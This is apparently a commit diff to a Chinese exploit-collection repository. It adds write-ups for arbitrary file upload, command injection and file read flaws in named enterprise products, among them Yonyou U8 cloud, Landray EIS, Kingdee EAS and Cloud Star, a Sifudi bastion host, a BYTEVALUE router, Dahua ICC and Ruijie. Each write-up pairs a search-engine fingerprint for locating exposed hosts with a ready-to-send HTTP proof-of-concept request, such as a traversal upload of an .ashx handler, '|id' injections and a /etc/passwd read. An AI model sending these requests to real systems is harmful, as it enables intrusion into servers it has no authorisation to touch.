更新漏洞

OA产品漏洞/用友 U8 cloud upload.jsp 任意文件上传漏洞.md

@@ -0,0 +1,40 @@
+# 用友 U8 cloud upload.jsp 任意文件上传漏洞
+
+## 漏洞描述
+
+用友 U8 cloud upload.jsp 文件存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限
+
+## 漏洞影响
+
+用友 U8 cloud
+
+## 网络测绘
+
+```
+"开启U8 cloud云端之旅"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20231116141405041](images/image-20231116141405041.png)
+
+poc
+
+```
+POST /linux/pages/upload.jsp HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+filename: Test.jsp
+Accept-Encoding: gzip
+
+<% out.println("Test");%>
+```
+
+![image-20231116141354722](images/image-20231116141354722.png)
+
+```
+/linux/Test.jsp
+```
+

OA产品漏洞/蓝凌EIS 智慧协同平台 api.aspx 任意文件上传漏洞.md

@@ -0,0 +1,50 @@
+# 蓝凌EIS 智慧协同平台 api.aspx 任意文件上传漏洞
+
+## 漏洞描述
+
+蓝凌EIS 智慧协同平台 api.aspx 文件存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件
+
+## 漏洞影响
+
+蓝凌EIS 智慧协同平台
+
+## 网络测绘
+
+```
+icon_hash="953405444"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20231116141557650](images/image-20231116141557650.png)
+
+poc
+
+```
+POST /eis/service/api.aspx?action=saveImg HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
+Content-Length: 219
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynUqjgvhmkL1dxpCV
+Upgrade-Insecure-Requests: 1
+
+------WebKitFormBoundarynUqjgvhmkL1dxpCV
+Content-Disposition: form-data; name="file"filename="test.asp"
+Content-Type: text/html
+
+<% response.write("Test")%>
+------WebKitFormBoundarynUqjgvhmkL1dxpCV--
+```
+
+![image-20231116141617020](images/image-20231116141617020.png)
+
+```
+/files/editor_img/xxx/xxx.asp
+```
+

OA产品漏洞/金蝶OA EAS系统 uploadLogo.action 任意文件上传漏洞.md

@@ -0,0 +1,60 @@
+# 金蝶OA EAS系统 uploadLogo.action 任意文件上传漏洞
+
+## 漏洞描述
+
+金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件，旨在帮助企业实现全面的管理和业务流程优化。金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 存在文件上传漏洞，攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。
+
+## 漏洞影响
+
+金蝶OA EAS系统
+
+## 网络测绘
+
+```
+"/easportal/"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20231116141032395](images/image-20231116141032395.png)
+
+poc
+
+```
+POST /plt_portal/setting/uploadLogo.action HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycxkT8bV6WLIUzm2p
+
+------WebKitFormBoundarycxkT8bV6WLIUzm2p
+Content-Disposition: form-data; name="chooseLanguage_top"
+ch
+
+------WebKitFormBoundarycxkT8bV6WLIUzm2p
+Content-Disposition: form-data; name="dataCenter"
+
+xx
+------WebKitFormBoundarycxkT8bV6WLIUzm2p 
+Content-Disposition: form-data; name="insId"
+
+------WebKitFormBoundarycxkT8bV6WLIUzm2p
+Content-Disposition: form-data; name="type"
+
+top
+------WebKitFormBoundarycxkT8bV6WLIUzm2p
+Content-Disposition: form-data; name="upload"; filename="text.jsp"
+Content-Type: image/jpeg
+
+Test
+------WebKitFormBoundarycxkT8bV6WLIUzm2p--
+```
+
+![image-20231116141050903](images/image-20231116141050903.png)
+
+```
+/portal/res/file/upload/xxx.jsp
+```
+

OA产品漏洞/金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞.md

@@ -0,0 +1,68 @@
+# 金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞
+
+## 漏洞描述
+
+金蝶OA 云星空 ScpSupRegHandler 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件获取服务器权限
+
+## 漏洞影响
+
+金蝶OA 云星空
+
+## 网络测绘
+
+```
+app="金蝶云星空-管理中心"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20231116140635693](images/image-20231116140635693.png)
+
+poc
+
+```
+POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
+Host: 
+Accept-Encoding: identity
+Content-Length: 973
+Accept-Language: zh-CN,zh;q=0.8
+Accept: */*
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061
+
+--2ac719f8e29343df94aa4ab49e456061
+Content-Disposition: form-data; name="dbId_v"
+
+.
+--2ac719f8e29343df94aa4ab49e456061
+Content-Disposition: form-data; name="FID"
+
+2022
+--2ac719f8e29343df94aa4ab49e456061
+Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx."
+Content-Type: text/plain
+
+<%@ WebHandler Language="C#" Class="TestHandler" %>
+        using System;
+        using System.Web;
+        public class TestHandler : IHttpHandler {
+            public void
+            ProcessRequest (HttpContext context) {
+                context.Response.ContentType= "text/plain";
+                context.Response.Write("Test");
+            }
+            public bool IsReusable {
+                get {return false; }
+            }
+        }
+--2ac719f8e29343df94aa4ab49e456061--
+```
+
+![image-20231116140545666](images/image-20231116140545666.png)
+
+```
+/K3Cloud/uploadfiles/Test.ashx
+```
+

README.md

@@ -148,6 +148,7 @@
   * 用友 NC NCFindWeb 任意文件读取漏洞
   * 用友 NC XbrlPersistenceServlet反序列化
   * 用友 NCCloud FS文件管理SQL注入
+  * 用友 U8 cloud upload.jsp 任意文件上传漏洞
   * 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞
   * 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞
   * 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
@@ -170,6 +171,7 @@
   * 致远OA webmail.do 任意文件下载 CNVD-2020-62422
   * 致远OA wpsAssistServlet 任意文件上传漏洞
   * 致远OA 帆软组件 ReportServer 目录遍历漏洞
+  * 蓝凌EIS 智慧协同平台 api.aspx 任意文件上传漏洞
   * 蓝凌OA admin.do JNDI远程命令执行
   * 蓝凌OA custom.jsp 任意文件读取漏洞
   * 蓝凌OA kmImeetingRes.do 后台SQL注入漏洞 CNVD-2021-01363
@@ -197,8 +199,10 @@
   * 金和OA C6 download.jsp 任意文件读取漏洞
   * 金和OA C6 OpenFile.aspx 后台越权敏感文件遍历漏洞
   * 金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
+  * 金蝶OA EAS系统 uploadLogo.action 任意文件上传漏洞
   * 金蝶OA server_file 目录遍历漏洞
   * 金蝶OA 云星空 CommonFileServer 任意文件读取漏洞
+  * 金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞
 - Web应用漏洞
 
   * 1039家校通 万能密码绕过 CNVD-2020-31494
@@ -712,6 +716,7 @@
   * Kyan 网络监控设备 run.php 远程命令执行漏洞
   * Kyan 网络监控设备 time.php 远程命令执行漏洞
   * MagicFlow 防火墙网关 main.xp 任意文件读取漏洞
+  * Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714
   * Milesight VPN server.js 任意文件读取漏洞
   * MSA 互联网管理网关 msa 任意文件下载漏洞
   * NetMizer 日志管理系统 cmd.php 远程命令执行漏洞
@@ -759,6 +764,7 @@
   * 启明星辰 4A统一安全管控平台 getMaster.do 信息泄漏漏洞
   * 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793
   * 启明星辰 天清汉马USG防火墙 默认口令漏洞
+  * 大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞
   * 大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞
   * 大华 智慧园区综合管理平台 getFaceCapture SQL注入漏洞
   * 大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞
@@ -776,6 +782,7 @@
   * 宏电 H8922 后台管理员信息泄露漏洞 CVE-2021-28151
   * 小米 路由器 c_upload 远程命令执行漏洞 CVE-2019-18370
   * 小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371
+  * 思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
   * 悦泰节能 智能数据网关 resources 任意文件读取漏洞
   * 惠尔顿 e地通 config.xml 信息泄漏漏洞
   * 才茂通信 网关 formping 远程命令执行漏洞
@@ -785,6 +792,7 @@
   * 电信 中兴ZXHN F450A网关 默认管理员账号密码漏洞
   * 电信 天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞
   * 电信 网关配置管理系统 login.php SQL注入漏洞
+  * 百为通达 智能流控路由器 open 远程命令执行漏洞
   * 百卓 Patflow showuser.php 后台SQL注入漏洞
   * 百卓 Smart importhtml.php 远程命令执行漏洞
   * 皓峰防火墙 setdomain.php 越权访问漏洞
@@ -821,6 +829,7 @@
   * 锐捷 Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369
   * 锐捷 SSL VPN 越权访问漏洞
   * 锐捷 云课堂主机 pool 目录遍历漏洞
+  * 锐捷 校园网自助服务系统 login_judge.jsf 任意文件读取漏洞
   * 飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞
   * 飞鱼星 家用智能路由 cookie.cgi 权限绕过
 ## 0x02 声明

其他漏洞/Ueditor编辑器漏洞总结.md

@@ -15,7 +15,7 @@ UEditor 是由百度「FEX前端研发团队」开发的所见即所得富文本
 file 目录文件读取：
 
 ```
-http://www.xxxx.comhttps://14.23.155.17 /net/controller.ashx?action=listfile
+http://www.xxxx.com/net/controller.ashx?action=listfile
 ```
 
 image 目录文件读取：

网络设备漏洞/Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714.md

@@ -0,0 +1,29 @@
+# Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714
+
+## 漏洞描述
+
+Milesight Router 存在信息泄漏漏洞，攻击者通过访问httpd.log可以获取登陆敏感日志信息
+
+## 漏洞影响
+
+Milesight Router
+
+## 网络测绘
+
+```
+"rt_title"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20231116142232135](images/image-20231116142232135.png)
+
+poc
+
+```
+/lang/log/httpd.log
+```
+
+![image-20231116142246862](images/image-20231116142246862.png)

网络设备漏洞/大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞.md

@@ -0,0 +1,29 @@
+# 大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞
+
+## 漏洞描述
+
+大化 ICC智能物联综合管理平台 readPic 接口存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感文件
+
+## 漏洞影响
+
+大华 ICC智能物联综合管理平台
+
+## 网络测绘
+
+```
+body="*客户端会小于800*"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20231116141833821](images/image-20231116141833821.png)
+
+poc
+
+```
+/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd
+```
+
+![image-20231116141852063](images/image-20231116141852063.png)

网络设备漏洞/思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞.md

@@ -0,0 +1,38 @@
+# 思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
+
+## 漏洞描述
+
+思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞。
+
+## 漏洞影响
+
+思福迪 运维安全管理系统
+
+## 网络测绘
+
+```
+app="思福迪-LOGBASE"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20231116142127906](images/image-20231116142127906.png)
+
+poc
+
+```
+POST /bhost/test_qrcode_b HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+Content-Length: 23
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Referer: http://xxx.xxx.xxx.xxx
+Accept-Encoding: gzip
+
+z1=1&z2="|id;"&z3=bhost
+```
+
+![image-20231116142143817](images/image-20231116142143817.png)

网络设备漏洞/百为通达 智能流控路由器 open 远程命令执行漏洞.md

@@ -0,0 +1,30 @@
+# 百为通达 智能流控路由器 open 远程命令执行漏洞
+
+## 漏洞描述
+
+BYTEVALUE 百为流控路由器是一款追求带宽利用率的多功能路由器。百为智能流控路由器 /goform/webRead/open 路由存在有回显的命令注入漏洞。
+
+## 漏洞影响
+
+百为通达 智能流控路由器
+
+## 网络测绘
+
+```
+"BYTEVALUE 智能流控路由器"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20231116142008257](images/image-20231116142008257.png)
+
+poc
+
+```
+GET /goform/webRead/open/?path=|id HTTP/1.1
+Host:
+```
+
+![image-20231116142021268](images/image-20231116142021268.png)

网络设备漏洞/锐捷 校园网自助服务系统 login_judge.jsf 任意文件读取漏洞.md

@@ -0,0 +1,29 @@
+# 锐捷 校园网自助服务系统 login_judge.jsf 任意文件读取漏洞
+
+## 漏洞描述
+
+锐捷 校园网自助服务系统 login_judge.jsf 接口存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感文件
+
+## 漏洞影响
+
+锐捷 校园网自助服务系统
+
+## 网络测绘
+
+```
+body="校园网自助服务系统"
+```
+
+## 漏洞复现
+
+登陆页面
+
+![image-20231116142459917](images/image-20231116142459917.png)
+
+poc
+
+```
+/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F
+```
+
+![image-20231116142521368](images/image-20231116142521368.png)